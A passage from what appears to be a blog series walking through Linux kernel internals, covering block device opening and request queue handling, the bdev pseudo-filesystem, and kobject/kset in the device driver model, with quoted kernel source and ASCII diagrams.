      inode->i_fop = &def_blk_fops;
      inode->i_rdev = rdev;
    } else if (S_ISFIFO(mode))
      inode->i_fop = &pipefifo_fops;
    else if (S_ISSOCK(mode))
      inode->i_fop = &bad_sock_fops;
    else
      printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
          " inode %s:%lu\n", mode, inode->i_sb->s_id,
          inode->i_ino);
    }

So inode’s i_fop’ will be ‘def_blk_fops’.

const struct file_operations def_blk_fops = {
    .open  = blkdev_open,
    .release = blkdev_close,
    .llseek  = block_llseek,
    .read  = do_sync_read,
    .write  = do_sync_write,
    .aio_read = blkdev_aio_read,
    .aio_write = blkdev_aio_write,
    .mmap  = generic_file_mmap,
    .fsync  = blkdev_fsync,
    .unlocked_ioctl = block_ioctl,
    #ifdef CONFIG_COMPAT
    .compat_ioctl = compat_blkdev_ioctl,
    #endif
    .splice_read = generic_file_splice_read,
    .splice_write = generic_file_splice_write,
};

When this block device such as /dev/ramhda is opened, ‘blkdev_open’ will be called.

static int blkdev_open(struct inode * inode, struct file * filp)
{
    struct block_device *bdev;

    /*
    * Preserve backwards compatibility and allow large file access
    * even if userspace doesn't ask for it explicitly. Some mkfs
    * binary needs it. We might want to drop this workaround
    * during an unstable branch.
    */
    filp->f_flags |= O_LARGEFILE;

    if (filp->f_flags & O_NDELAY)
      filp->f_mode |= FMODE_NDELAY;
    if (filp->f_flags & O_EXCL)
      filp->f_mode |= FMODE_EXCL;
    if ((filp->f_flags & O_ACCMODE) == 3)
      filp->f_mode |= FMODE_WRITE_IOCTL;

    bdev = bd_acquire(inode);
    if (bdev == NULL)
      return -ENOMEM;

    filp->f_mapping = bdev->bd_inode->i_mapping;

    return blkdev_get(bdev, filp->f_mode, filp);
}

This function does two thing, get the ‘block_device’ bdev using ‘bd_acquire’ and call ‘blkdev_get’ function. ‘bd_acquire’ will return an exist ‘block_device’ if open the whole disk, otherwise it will create a new ‘block_device’ to return. Any way, after, ‘bd_acquire’ return a ‘block_device’. The next function is ‘blkdev_get’. This function was discussed before. It calls ‘__blkdev_get’. This time we will discuss the differenct path. We will use opening a partition of a disk as an example, this time the partno is 1. First get the gendisk in ‘__blkdev_get’.

if (!bdev->bd_openers) {
      bdev->bd_disk = disk;
      bdev->bd_queue = disk->queue;
      bdev->bd_contains = bdev;
    ...
      struct block_device *whole;
      whole = bdget_disk(disk, 0);
      ret = -ENOMEM;
      if (!whole)
        goto out_clear;
      BUG_ON(for_part);
      ret = __blkdev_get(whole, mode, 1);
      if (ret)
        goto out_clear;
      bdev->bd_contains = whole;
      bdev_inode_switch_bdi(bdev->bd_inode,
        whole->bd_inode->i_data.backing_dev_info);
      bdev->bd_part = disk_get_part(disk, partno);
      if (!(disk->flags & GENHD_FL_UP) ||
          !bdev->bd_part || !bdev->bd_part->nr_sects) {
        ret = -ENXIO;
        goto out_clear;
      }
      bd_set_size(bdev, (loff_t)bdev->bd_part->nr_sects << 9);
  }

Then get the gendisk’s block_device and assign it to ‘whole’. ‘Whole’ later assign to ‘bdev->bd_contains’. Then call ‘__blkdev_get(whole, mode, 1);’ This goes to here:

{
  if (bdev->bd_contains == bdev) {
  ret = 0;
  if (bdev->bd_disk->fops->open)
    ret = bdev->bd_disk->fops->open(bdev, mode);
  /* the same as first opener case, read comment there */
  if (bdev->bd_invalidated) {
    if (!ret)
    rescan_partitions(bdev->bd_disk, bdev);
    else if (ret == -ENOMEDIUM)
    invalidate_partitions(bdev->bd_disk, bdev);
  }
  if (ret)
    goto out_unlock_bdev;
  }

Mostly call the ‘bd_disk->fops->open’. So here we can see, every disk has a ‘block_device’ and it is created when the ‘add_disk’ is called. For the partition, the kernel doesn’t create ‘block_device’ when detecting it and insert it to system, it is created when the partition is opened. Following pic show the partition’s ‘device_block’ and the gendisk’s ‘device_block’.

                                      block_de^ice
                                      +---------------+ <--+ <-----------------------------------+
+--------------------------------------+  bd_part      |    |                                     |
|                                      +---------------+    |                                     |
|            +-------------------------+  bd_disk      |    |                                     |
|            |                         +---------------+    |                                     |
|            |                         |  bd_contains  +----+                                     |
|            |                         +---------------+                                          |
|            |                         |bd_iin^alidated=0                                         |
|            |                         +---------------+                                          |
|            |                         |bd_openers=1   |                 block_de^ice             |
|            |                         +---------------+                 +---------------+        |
|            |                                                      +----+  bd_part      |        |
|            |                                                      |    +---------------+        |
|            |                   +---------------------------------------+  bd_disk      |        |
|            |                   |                                  |    +---------------+        |
|            v                   v                                  |    |  bd_contains  +--------+
|               gendisk                                             |    +---------------+
|            +-------------------+                                  |    |bd_iin^alidated=
|            |                   |                                  |    +---------------+
|            +-------------------+              disk_part_tbl       |    |bd_openers=1   |
|            |   *part_tbl       +------------> +---------------+   |    +---------------+
|            +-------------------+              |               |   |
|            |                   |              +---------------+   |
|            |                   |              |    len        |   |
|            |                   |              +---------------+   |
|            |                   |              |               |   +-------+
|            |                   |              +---------------+           |
+--------->  +-------------------+ <------------+    *part[0]   |           v
  part0      |   start_sect      |              +---------------+            hd_struct
            +-------------------+              |    *part[1]   +----------> +---------------+
            |   nr_sects        |              +---------------+            | start_sect    |
            +-------------------+                                           +---------------+
            |   __de^           |                                           | nr_sects      |
            +-------------------+                                           +---------------+
            |    partno=0       |                                           |  partno=1     |
            +-------------------+                                           +---------------+
            |                   |                                           |               |
            |                   |                                           +---------------+
            |                   |
            |                   |
            +-------------------+

blk_init_queue

The block device need a queue to contain the data request from the file system. And also a funtion to handle every request in the queue. There are two methods called ‘request’ and ‘make request’ to handle this. We first discuss the ‘request’ method. When using ‘request’, the block device driver has to allocate a request queue by calling ‘blk_init_queue’. The driver needs to implement a request handler function and pass this to ‘blk_init_queue’.

  struct request_queue *blk_init_queue(request_fn_proc *rfn, spinlock_t *lock)
  {
    return blk_init_queue_node(rfn, lock, NUMA_NO_NODE);
  }

  struct request_queue *
  blk_init_queue_node(request_fn_proc *rfn, spinlock_t *lock, int node_id)
  {
    struct request_queue *uninit_q, *q;

    uninit_q = blk_alloc_queue_node(GFP_KERNEL, node_id);
    if (!uninit_q)
      return NULL;

    q = blk_init_allocated_queue(uninit_q, rfn, lock);
    if (!q)
      blk_cleanup_queue(uninit_q);

    return q;
  }

  typedef void (request_fn_proc) (struct request_queue *q);

  struct 'request\_queue' represents a request queue. It is a very complicated structure. 
  struct request_queue {
    /*
    * Together with queue_head for cacheline sharing
    */
    struct list_head queue_head;
    struct request  *last_merge;
    struct elevator_queue *elevator;
    int   nr_rqs[2]; /* # allocated [a]sync rqs */
    int   nr_rqs_elvpriv; /* # allocated rqs w/ elvpriv */

    /*
    * If blkcg is not used, @q->root_rl serves all requests.  If blkcg
    * is used, root blkg allocates from @q->root_rl and all other
    * blkgs from their own blkg->rl.  Which one to use should be
    * determined using bio_request_list().
    */
    struct request_list root_rl;

    request_fn_proc  *request_fn;
    make_request_fn  *make_request_fn;
    prep_rq_fn  *prep_rq_fn;
    unprep_rq_fn  *unprep_rq_fn;
    merge_bvec_fn  *merge_bvec_fn;
    softirq_done_fn  *softirq_done_fn;
    rq_timed_out_fn  *rq_timed_out_fn;
    dma_drain_needed_fn *dma_drain_needed;
    lld_busy_fn  *lld_busy_fn;

    struct blk_mq_ops *mq_ops;

    unsigned int  *mq_map;

    /* sw queues */
    struct blk_mq_ctx *queue_ctx;
    unsigned int  nr_queues;

    /* hw dispatch queues */
    struct blk_mq_hw_ctx **queue_hw_ctx;
    unsigned int  nr_hw_queues;

    /*
    * Dispatch queue sorting
    */
    sector_t  end_sector;
    struct request  *boundary_rq;

    /*
    * Delayed queue handling
    */
    struct delayed_work delay_work;

    struct backing_dev_info backing_dev_info;

    /*
    * The queue owner gets to use this for whatever they like.
    * ll_rw_blk doesn't touch it.
    */
    void   *queuedata;

    /*
    * various queue flags, see QUEUE_* below
    */
    unsigned long  queue_flags;

  ...};

‘queue_head’ links all of the requests adding to this queue. The link’s element is struct ‘request’ which represents a request. The kernel will reorder or merge requests for performance consideration. ‘request_fn’ is the request handler function the driver implement. When other subsystems need to read or write data from the block device, kernel will this function if the device driver using the ‘request’ method. ‘make_request_fn’. If device driver using ‘blk_init_queue’ to handle request(‘request’ method), kernel will provide a standard function ‘blk_queue_bio’ for this field. If the device driver uses ‘make_request’, it needs to call ‘blk_queue_make_request’ to provide an implementation for this field. ‘blk_queue_make_request’ doesn’t allocate the request queue, so the device driver need call ‘blk_queue_make_request’ to allocate a request queue when using the ‘make_request’ method. ‘queue_flags’ indicate the request queue’s status, for example ‘QUEUE_FLAG_STOPPED’, ‘QUEUE_FLAG_PLUGGED’ and ‘QUEUE_FLAG_QUEUED’ and so on.

Every request is represented by an struct request.

struct request {
  union {
    struct list_head queuelist;
    struct llist_node ll_list;
  };
  union {
    struct call_single_data csd;
    struct work_struct mq_flush_data;
  };

  struct request_queue *q;
  struct blk_mq_ctx *mq_ctx;

  u64 cmd_flags;
  enum rq_cmd_type_bits cmd_type;
  unsigned long atomic_flags;

  int cpu;

  /* the following two fields are internal, NEVER access directly */
  unsigned int __data_len; /* total data len */
  sector_t __sector;  /* sector cursor */

  struct bio *bio;
  struct bio *biotail;

  struct hlist_node hash; /* merge hash */
  /*
  * The rb_node is only used inside the io scheduler, requests
  * are pruned when moved to the dispatch queue. So let the
  * completion_data share space with the rb_node.
  */
  union {
    struct rb_node rb_node; /* sort/lookup */
    void *completion_data;
  };

  /*
  * Three pointers are available for the IO schedulers, if they need
  * more they have to dynamically allocate it.  Flush requests are
  * never put on the IO scheduler. So let the flush fields share
  * space with the elevator data.
  */
  union {
    struct {
    struct io_cq  *icq;
    void   *priv[2];
    } elv;

    struct {
    unsigned int  seq;
    struct list_head list;
    rq_end_io_fn  *saved_end_io;
    } flush;
  };

  struct gendisk *rq_disk;
  struct hd_struct *part;
  unsigned long start_time;
  #ifdef CONFIG_BLK_CGROUP
  struct request_list *rl;  /* rl this rq is alloced from */
  unsigned long long start_time_ns;
  unsigned long long io_start_time_ns;    /* when passed to hardware */
  #endif
  /* Number of scatter-gather DMA addr+len pairs after
  * physical address coalescing is performed.
  */
  unsigned short nr_phys_segments;
  #if defined(CONFIG_BLK_DEV_INTEGRITY)
  unsigned short nr_integrity_segments;
  #endif

  unsigned short ioprio;

  void *special;  /* opaque pointer available for LLD use */
  char *buffer;  /* kaddr of the current segment if available */

  int tag;
  int errors;

  /*
  * when request is used as a packet command carrier
  */
  unsigned char __cmd[BLK_MAX_CDB];
  unsigned char *cmd;
  unsigned short cmd_len;

  unsigned int extra_len; /* length of alignment and padding */
  unsigned int sense_len;
  unsigned int resid_len; /* residual count */
  void *sense;

  unsigned long deadline;
  struct list_head timeout_list;
  unsigned int timeout;
  int retries;

  /*
  * completion callback.
  */
  rq_end_io_fn *end_io;
  void *end_io_data;

  /* for bidi */
  struct request *next_rq;
};

‘queuelist’ is used to links this request to struct blk_plug. ‘q’ represents the request queue of this request attached. ‘__data_len’ represents the total bytes this requst requires. ‘__sector’ represents the start sector. ‘bio’ and ‘biotail’. When one bio is traslated or merged to a request, the request links these bio. If the device driver uses ‘make_request’, the device driver can access these bio in the request handler function.

So let’s look at ‘blk_init_queue_node’ function.It calls two functions, as the name indicates alloc and init a queue. ‘blk_alloc_queue_node’ allocates a queue and do some basic initialization. The more initialization work is done in ‘blk_init_allocated_queue’

struct request_queue *
blk_init_allocated_queue(struct request_queue *q, request_fn_proc *rfn,
  spinlock_t *lock)
{
if (!q)
  return NULL;

if (blk_init_rl(&q->root_rl, q, GFP_KERNEL))
  return NULL;

q->request_fn  = rfn;
q->prep_rq_fn  = NULL;
q->unprep_rq_fn  = NULL;
q->queue_flags  |= QUEUE_FLAG_DEFAULT;

/* Override internal queue lock with supplied lock pointer */
if (lock)
  q->queue_lock  = lock;

/*
* This also sets hw/phys segments, boundary and size
*/
blk_queue_make_request(q, blk_queue_bio);

q->sg_reserved_size = INT_MAX;

/* Protect q->elevator from elevator_change */
mutex_lock(&q->sysfs_lock);

/* init elevator */
if (elevator_init(q, NULL)) {
  mutex_unlock(&q->sysfs_lock);
  return NULL;
}

mutex_unlock(&q->sysfs_lock);

return q;
}

We can see the assignment of ‘q->request_fn’ and calls of ‘blk_queue_make_request’. ‘blk_queue_bio’ will be used to generate the new requests and finally calls the device driver implement’s ‘request_fn’. Later is to call ‘elevator_init’. Kernel uses the ‘elevator algorithm’ to schedule the block requests. ‘elevator_init’ chooses a elevator algorithm for queue ‘q’. Here we will not care the detail of which algorithm the kernel uses. For now, we just need know the ‘blk_init_queue’ allocates and initializes a request queue for the block device, and chooses a schedule algorithm.

For the ‘make_request’ method, the device driver first call ‘blk_alloc_queue’to allocates a request queue and then call ‘blk_queue_make_request’ to assign the self-implementation make_request function to ‘q->make_request_fn’.

submit requests to block devices

When the file system need to read or write data from disk, it need to send requests to the device’s request queue, this is done by ‘submit_io’. ‘bio’ contains the request’s detail. When ‘submit_io’ is called, the struct bio has been created. Here we don’t care how to create a bio but just focus how the block device driver handle it.

void submit_bio(int rw, struct bio *bio)
{
  bio->bi_rw |= rw;

  /*
  * If it's a regular read/write or a barrier with data attached,
  * go through the normal accounting stuff before submission.
  */
  if (bio_has_data(bio)) {
    unsigned int count;

    if (unlikely(rw & REQ_WRITE_SAME))
    count = bdev_logical_block_size(bio->bi_bdev) >> 9;
    else
    count = bio_sectors(bio);

    if (rw & WRITE) {
    count_vm_events(PGPGOUT, count);
    } else {
    task_io_account_read(bio->bi_size);
    count_vm_events(PGPGIN, count);
    }

    if (unlikely(block_dump)) {
    char b[BDEVNAME_SIZE];
    printk(KERN_DEBUG "%s(%d): %s block %Lu on %s (%u sectors)\n",
    current->comm, task_pid_nr(current),
      (rw & WRITE) ? "WRITE" : "READ",
      (unsigned long long)bio->bi_sector,
      bdevname(bio->bi_bdev, b),
      count);
    }
  }

  generic_make_request(bio);
}

void generic_make_request(struct bio *bio)
{
  struct bio_list bio_list_on_stack;

  if (!generic_make_request_checks(bio))
    return;

  /*
  * We only want one ->make_request_fn to be active at a time, else
  * stack usage with stacked devices could be a problem.  So use
  * current->bio_list to keep a list of requests submited by a
  * make_request_fn function.  current->bio_list is also used as a
  * flag to say if generic_make_request is currently active in this
  * task or not.  If it is NULL, then no make_request is active.  If
  * it is non-NULL, then a make_request is active, and new requests
  * should be added at the tail
  */
  if (current->bio_list) {
    bio_list_add(current->bio_list, bio);
    return;
  }

  /* following loop may be a bit non-obvious, and so deserves some
  * explanation.
  * Before entering the loop, bio->bi_next is NULL (as all callers
  * ensure that) so we have a list with a single bio.
  * We pretend that we have just taken it off a longer list, so
  * we assign bio_list to a pointer to the bio_list_on_stack,
  * thus initialising the bio_list of new bios to be
  * added.  ->make_request() may indeed add some more bios
  * through a recursive call to generic_make_request.  If it
  * did, we find a non-NULL value in bio_list and re-enter the loop
  * from the top.  In this case we really did just take the bio
  * of the top of the list (no pretending) and so remove it from
  * bio_list, and call into ->make_request() again.
  */
  BUG_ON(bio->bi_next);
  bio_list_init(&bio_list_on_stack);
  current->bio_list = &bio_list_on_stack;
  do {
    struct request_queue *q = bdev_get_queue(bio->bi_bdev);

    q->make_request_fn(q, bio);

    bio = bio_list_pop(current->bio_list);
  } while (bio);
  current->bio_list = NULL; /* deactivate */
}

The most work is done by ‘generic_make_request’. First check if the process has request to handle, if it is add this new bio to ‘current->bio_list’.

if (current->bio_list) {
  bio_list_add(current->bio_list, bio);
  return;
}

Then for every bio, it calls the ‘make_request_fn’.

do {
  struct request_queue *q = bdev_get_queue(bio->bi_bdev);

  q->make_request_fn(q, bio);

  bio = bio_list_pop(current->bio_list);
} while (bio);

If the block device driver uses ‘request’, the ‘make_request_fn’ is ‘blk_queue_bio.

void blk_queue_bio(struct request_queue *q, struct bio *bio)
{
  const bool sync = !!(bio->bi_rw & REQ_SYNC);
  struct blk_plug *plug;
  int el_ret, rw_flags, where = ELEVATOR_INSERT_SORT;
  struct request *req;
  unsigned int request_count = 0;

  /*
  * low level driver can indicate that it wants pages above a
  * certain limit bounced to low memory (ie for highmem, or even
  * ISA dma in theory)
  */
  blk_queue_bounce(q, &bio);

  if (bio_integrity_enabled(bio) && bio_integrity_prep(bio)) {
    bio_endio(bio, -EIO);
    return;
  }

  if (bio->bi_rw & (REQ_FLUSH | REQ_FUA)) {
    spin_lock_irq(q->queue_lock);
    where = ELEVATOR_INSERT_FLUSH;
    goto get_rq;
  }

  /*
  * Check if we can merge with the plugged list before grabbing
  * any locks.
  */
  if (blk_attempt_plug_merge(q, bio, &request_count))
    return;

  spin_lock_irq(q->queue_lock);

  el_ret = elv_merge(q, &req, bio);
  if (el_ret == ELEVATOR_BACK_MERGE) {
    if (bio_attempt_back_merge(q, req, bio)) {
    elv_bio_merged(q, req, bio);
    if (!attempt_back_merge(q, req))
      elv_merged_request(q, req, el_ret);
    goto out_unlock;
    }
  } else if (el_ret == ELEVATOR_FRONT_MERGE) {
    if (bio_attempt_front_merge(q, req, bio)) {
    elv_bio_merged(q, req, bio);
    if (!attempt_front_merge(q, req))
      elv_merged_request(q, req, el_ret);
    goto out_unlock;
    }
  }

  get_rq:
  /*
  * This sync check and mask will be re-done in init_request_from_bio(),
  * but we need to set it earlier to expose the sync flag to the
  * rq allocator and io schedulers.
  */
  rw_flags = bio_data_dir(bio);
  if (sync)
    rw_flags |= REQ_SYNC;

  /*
  * Grab a free request. This is might sleep but can not fail.
  * Returns with the queue unlocked.
  */
  req = get_request(q, rw_flags, bio, GFP_NOIO);
  if (unlikely(!req)) {
    bio_endio(bio, -ENODEV); /* @q is dead */
    goto out_unlock;
  }

  /*
  * After dropping the lock and possibly sleeping here, our request
  * may now be mergeable after it had proven unmergeable (above).
  * We don't worry about that case for efficiency. It won't happen
  * often, and the elevators are able to handle it.
  */
  init_request_from_bio(req, bio);

  if (test_bit(QUEUE_FLAG_SAME_COMP, &q->queue_flags))
    req->cpu = raw_smp_processor_id();

  plug = current->plug;
  if (plug) {
    /*
    * If this is the first request added after a plug, fire
    * of a plug trace.
    */
    if (!request_count)
    trace_block_plug(q);
    else {
    if (request_count >= BLK_MAX_REQUEST_COUNT) {
      blk_flush_plug_list(plug, false);
      trace_block_plug(q);
    }
    }
    list_add_tail(&req->queuelist, &plug->list);
    blk_account_io_start(req, true);
  } else {
    spin_lock_irq(q->queue_lock);
    add_acct_request(q, req, where);
    __blk_run_queue(q);
  out_unlock:
    spin_unlock_irq(q->queue_lock);
  }
}

‘blk_queue_bio’ reorders or merges the bio with current requests if it can. If not, this function allocates a new request and uses the bio to initializes the request. The requests are processed in function ‘__blk_run_queue’.

void __blk_run_queue(struct request_queue *q)
{
  if (unlikely(blk_queue_stopped(q)))
    return;

  __blk_run_queue_uncond(q);
  }
  inline void __blk_run_queue_uncond(struct request_queue *q)
  {
  if (unlikely(blk_queue_dead(q)))
    return;

  /*
  * Some request_fn implementations, e.g. scsi_request_fn(), unlock
  * the queue lock internally. As a result multiple threads may be
  * running such a request function concurrently. Keep track of the
  * number of active request_fn invocations such that blk_drain_queue()
  * can wait until all these request_fn calls have finished.
  */
  q->request_fn_active++;
  q->request_fn(q);
  q->request_fn_active--;
}

In here we see it call the ‘request_fn’ we implement in device driver. For now we can distinguish the difference ‘request’ and ‘make_request’ method. When the block device driver uses ‘request’, the file system send the bio to block subsystem it is processed by the ‘blk_queue_bio’, ‘blk_queue_bio’ do a lot of work to optimize the bio and convert the bio to requests and call the driver’s implementation of ‘request_fn’ callback. As for ‘make_request’ method, the driver actually implement his own ‘blk_queue_bio’, so these bio will not go to the IO scheduler and goes directly to the device driver’s implementation of ‘make_request_fn’. So the self-implementation of ‘make_request_fn’ need to process the bios directly, not the request. Most of the block device driver will use the ‘request’ method. So end of the long article, hope you enjoy it.

Anatomy of the Linux 'bdev' file system

2018-06-14T00:00:00+00:00

‘bdev’ file system is used for block device’s inode. This fs is initialized in function ‘bdev_cache_init’

    void __init bdev_cache_init(void)
    {
        int err;
        static struct vfsmount *bd_mnt;

        bdev_cachep = kmem_cache_create("bdev_cache", sizeof(struct bdev_inode),
        0, (SLAB_HWCACHE_ALIGN|SLAB_RECLAIM_ACCOUNT|
            SLAB_MEM_SPREAD|SLAB_PANIC),
        init_once);
        err = register_filesystem(&bd_type);
        if (err)
            panic("Cannot register bdev pseudo-fs");
        bd_mnt = kern_mount(&bd_type);
        if (IS_ERR(bd_mnt))
            panic("Cannot create bdev pseudo-fs");
        blockdev_superblock = bd_mnt->mnt_sb;   /* For writeback */

        #define kern_mount(type) kern_mount_data(type, NULL)

        struct vfsmount *kern_mount_data(struct file_system_type *type, void *data)
        {
            struct vfsmount *mnt;
            mnt = vfs_kern_mount(type, MS_KERNMOUNT, type->name, data);
            if (!IS_ERR(mnt)) {
            /*
            * it is a longterm mount, don't release mnt until
            * we unmount before file sys is unregistered
            */
            real_mount(mnt)->mnt_ns = MNT_NS_INTERNAL;
            }
            return mnt;
        }

    struct vfsmount *
    vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
    {
        struct mount *mnt;
        struct dentry *root;

        if (!type)
        return ERR_PTR(-ENODEV);

        mnt = alloc_vfsmnt(name);
        if (!mnt)
        return ERR_PTR(-ENOMEM);

        if (flags & MS_KERNMOUNT)
        mnt->mnt.mnt_flags = MNT_INTERNAL;

        root = mount_fs(type, flags, name, data);
        if (IS_ERR(root)) {
        free_vfsmnt(mnt);
        return ERR_CAST(root);
        }

        mnt->mnt.mnt_root = root;
        mnt->mnt.mnt_sb = root->d_sb;
        mnt->mnt_mountpoint = mnt->mnt.mnt_root;
        mnt->mnt_parent = mnt;
        lock_mount_hash();
        list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
        unlock_mount_hash();
        return &mnt->mnt;
    }

After registering ‘bdev’ fs, the initialize function mounts it.

    struct dentry *
    mount_fs(struct file_system_type *type, int flags, const char *name, void *data)
    {
        struct dentry *root;
        struct super_block *sb;
        char *secdata = NULL;
        int error = -ENOMEM;

        ...
        root = type->mount(type, flags, name, data);
        if (IS_ERR(root)) {
            error = PTR_ERR(root);
            goto out_free_secdata;
        }
        sb = root->d_sb;
        BUG_ON(!sb);
        WARN_ON(!sb->s_bdi);
        WARN_ON(sb->s_bdi == &default_backing_dev_info);
        sb->s_flags |= MS_BORN;
        ...
        /*
        * filesystems should never set s_maxbytes larger than MAX_LFS_FILESIZE
        * but s_maxbytes was an unsigned long long for many releases. Throw
        * this warning for a little while to try and catch filesystems that
        * violate this rule.
        */
        WARN((sb->s_maxbytes < 0), "%s set sb->s_maxbytes to "
        "negative value (%lld)\n", type->name, sb->s_maxbytes);

        up_write(&sb->s_umount);
        free_secdata(secdata);
        return root;
        out_sb:
        dput(root);
        deactivate_locked_super(sb);
        out_free_secdata:
        free_secdata(secdata);
        out:
        return ERR_PTR(error);
    }

‘mount_fs’ first call ‘type->mount’ to get a root dentry. This type->mount is ‘‘bd_mount’.

    static struct dentry *bd_mount(struct file_system_type *fs_type,
    int flags, const char *dev_name, void *data)
    {
        return mount_pseudo(fs_type, "bdev:", &bdev_sops, NULL, BDEVFS_MAGIC);
    }

    struct dentry *mount_pseudo(struct file_system_type *fs_type, char *name,
        const struct super_operations *ops,
        const struct dentry_operations *dops, unsigned long magic)
    {
        struct super_block *s;
        struct dentry *dentry;
        struct inode *root;
        struct qstr d_name = QSTR_INIT(name, strlen(name));

        s = sget(fs_type, NULL, set_anon_super, MS_NOUSER, NULL);
        if (IS_ERR(s))
        return ERR_CAST(s);

        s->s_maxbytes = MAX_LFS_FILESIZE;
        s->s_blocksize = PAGE_SIZE;
        s->s_blocksize_bits = PAGE_SHIFT;
        s->s_magic = magic;
        s->s_op = ops ? ops : &simple_super_operations;
        s->s_time_gran = 1;
        root = new_inode(s);
        if (!root)
            goto Enomem;
            /*
            * since this is the first inode, make it number 1. New inodes created
            * after this must take care not to collide with it (by passing
            * max_reserved of 1 to iunique).
            */
            root->i_ino = 1;
            root->i_mode = S_IFDIR | S_IRUSR | S_IWUSR;
            root->i_atime = root->i_mtime = root->i_ctime = CURRENT_TIME;
            dentry = __d_alloc(s, &d_name);
            if (!dentry) {
            iput(root);
            goto Enomem;
        }
        d_instantiate(dentry, root);
        s->s_root = dentry;
        s->s_d_op = dops;
        s->s_flags |= MS_ACTIVE;
        return dget(s->s_root);

        Enomem:
        deactivate_locked_super(s);
        return ERR_PTR(-ENOMEM);
    }

In’ mount_pseudo’, we first allocate a super_block and then allocate the root inode and dentry and initialize these data. The super_operations for this ‘bdev’ fs is ‘bdev_sops’.

static const struct super_operations bdev_sops = {
    .statfs = simple_statfs,
    .alloc_inode = bdev_alloc_inode,
    .destroy_inode = bdev_destroy_inode,
    .drop_inode = generic_delete_inode,
    .evict_inode = bdev_evict_inode,
};

Finally the super block in ‘bd_mnt->mnt_sb’ is assigned the global variable ‘blockdev_superblock’. After ‘bdev’ is registered, the structure has following shape.

                               super_operations
                              +--------------+
                              |              |
                              +--------------|
                              |bdev_alloc_inode
blockde^_superblock           +--------------+
       +----------+           |              |
       |          |           |              |
       |          |           |              |
       +----------+           |              |
       | s_op     +---------> +--------------+
       +----------+
       | s_root   +---------> +--------------+         inode
       +----------+           |              |         +---------+
                              |              |         |         |
                              |              |         |         |
                              |              |         |         |
                              +--------------+         |         |
                              |  d_inode     +-------> +---------+
                              +--------------+
                             dentry

Anatomy of the Linux device driver model

2018-06-10T00:00:00+00:00

Welcome back the anatomy series articles, this one we will talk about the Linux device driver model.

kobject and kset

kobject and kset is the basis of device driver model. Every kobject represent a kernel object.

struct kobject {
 const char  *name;
 struct list_head entry;
 struct kobject  *parent;
 struct kset  *kset;
 struct kobj_type *ktype;
 struct sysfs_dirent *sd;
 struct kref  kref;
#ifdef CONFIG_DEBUG_KOBJECT_RELEASE
 struct delayed_work release;
#endif
 unsigned int state_initialized:1;
 unsigned int state_in_sysfs:1;
 unsigned int state_add_uevent_sent:1;
 unsigned int state_remove_uevent_sent:1;
 unsigned int uevent_suppress:1;
};

‘name’ indicates the object’s name and will be show in a directory in sysfs file system. ‘parent’ indicates the object’s parent, this makes objects’ hierarchical structure. ‘kset’ can be considered as a connection of the same kobject. ‘ktype’ represents the object’s type, different objects has different type. kernel connects ‘ktype’ with the object’s sysfs’s file operations and attributes file. ‘sd’ indicates a directory entry instance in sysfs file syste. ‘uevent_suppress’ indicates whether the ‘kset’ of this object belongs to should send an uevent to the userspace.

‘kobject_init’ function is used to initialize a kobject. ‘kobject_add’ function create the object hierarchical and also create directory in sysfs, this directory will lies in ‘parent’ (while a parent is not NULL) or in the kset directory(parent is NULL) or in the root(if both NULL).

kobject’s attributes

There is a kobj_type field in kobject。

  struct kobj_type {
   void (*release)(struct kobject *kobj);
   const struct sysfs_ops *sysfs_ops;
   struct attribute **default_attrs;
   const struct kobj_ns_type_operations *(*child_ns_type)(struct kobject *kobj);
   const void *(*namespace)(struct kobject *kobj);
  };
  
  
  
  struct sysfs_ops {
   ssize_t (*show)(struct kobject *, struct attribute *, char *);
   ssize_t (*store)(struct kobject *, struct attribute *, const char *, size_t);
  };
  
  struct attribute {
      const char      *name;
      umode_t         mode;
  #ifdef CONFIG_DEBUG_LOCK_ALLOC
      bool            ignore_lockdep:1;
      struct lock_class_key   *key;
      struct lock_class_key   skey;
  #endif
  };

‘default_attrs’ defines some attributes and sysfs_ops defines the operations that operates the attribute.

‘sysfs_create_file’ can be used for creating an attribute file in kobject. When the userspace opena file in sysfs, ‘sysfs_open_file’ will be called, it allocates a struct ‘struct sysfs_open_file ’ of and call ‘sysfs_get_open_dirent’, the later will set the

    ((struct seq_file *)file->private_data)->private = data;

Later in writing:

    static ssize_t sysfs_write_file(struct file *file, const char __user *user_buf,
                    size_t count, loff_t *ppos)
    {
        struct sysfs_open_file *of = sysfs_of(file);
        ssize_t len = min_t(size_t, count, PAGE_SIZE);
        loff_t size = file_inode(file)->i_size;
        char *buf;
    
        if (sysfs_is_bin(of->sd) && size) {
            if (size <= *ppos)
                return 0;
            len = min_t(ssize_t, len, size - *ppos);
        }
    
        if (!len)
            return 0;
    
        buf = kmalloc(len + 1, GFP_KERNEL);
        if (!buf)
            return -ENOMEM;
    
        if (copy_from_user(buf, user_buf, len)) {
            len = -EFAULT;
            goto out_free;
        }
        buf[len] = '\0';    /* guarantee string termination */
    
        len = flush_write_buffer(of, buf, *ppos, len);
        if (len > 0)
            *ppos += len;
    out_free:
        kfree(buf);
        return len;
    }
    
    static struct sysfs_open_file *sysfs_of(struct file *file)
    {
        return ((struct seq_file *)file->private_data)->private;
    }
    
    static int flush_write_buffer(struct sysfs_open_file *of, char *buf, loff_t off,
                    size_t count)
    {
        struct kobject *kobj = of->sd->s_parent->s_dir.kobj;
        int rc = 0;   
    
            const struct sysfs_ops *ops = sysfs_file_ops(of->sd);
    
            rc = ops->store(kobj, of->sd->s_attr.attr, buf, count);
        return rc;
    }

call the sysfs_ops store through sysfs_open_file struct of.

kset

kset is a collection of kobjects, it self is a kobject so it has a kobject field.

struct kset {
 struct list_head list;
 spinlock_t list_lock;
 struct kobject kobj;
 const struct kset_uevent_ops *uevent_ops;
};

‘list’ links the kobjects belongs to this kset. ‘uevent_ops’ defines some function pointers, when some of the kobjects’ status has changed, it will call these function pointers.

struct kset_uevent_ops {
 int (* const filter)(struct kset *kset, struct kobject *kobj);
 const char *(* const name)(struct kset *kset, struct kobject *kobj);
 int (* const uevent)(struct kset *kset, struct kobject *kobj,
        struct kobj_uevent_env *env);
};

We can use ‘kset_register’ to register and add a kset to the system.

int kset_register(struct kset *k)
{
 int err;

 if (!k)
  return -EINVAL;

 kset_init(k);
 err = kobject_add_internal(&k->kobj);
 if (err)
  return err;
 kobject_uevent(&k->kobj, KOBJ_ADD);
 return 0;
}

